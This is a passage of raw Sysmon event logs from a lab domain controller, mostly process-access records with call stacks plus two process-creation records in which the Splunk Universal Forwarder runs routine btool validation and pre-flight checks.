L32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001621Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:23.011{5D479F2C-16B2-5F84-3F00-000000007F01}38923896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001865Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B4-5F84-5000-000000007F01}3672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001864Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001863Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001862Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001861Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001860Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001859Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001858Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001857Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001856Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16B4-5F84-5000-000000007F01}3672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001855Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001854Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16B4-5F84-4F00-000000007F01}36563660C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{5D479F2C-16B4-5F84-5000-000000007F01}3672C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001853Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.902{5D479F2C-16B4-5F84-5000-000000007F01}3672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{5D479F2C-16B4-5F84-4F00-000000007F01}3656C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000001852Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B4-5F84-4F00-000000007F01}3656C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001851Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001850Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001849Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001848Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001847Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001846Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001845Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001844Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001843Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001842Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B4-5F84-4F00-000000007F01}3656C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001841Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.886{5D479F2C-16B3-5F84-4800-000000007F01}32842912C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5D479F2C-16B4-5F84-4F00-000000007F01}3656C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001840Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.897{5D479F2C-16B4-5F84-4F00-000000007F01}3656C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001839Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:24.855{5D479F2C-16B4-5F84-4E00-000000007F01}36163612C:\Program 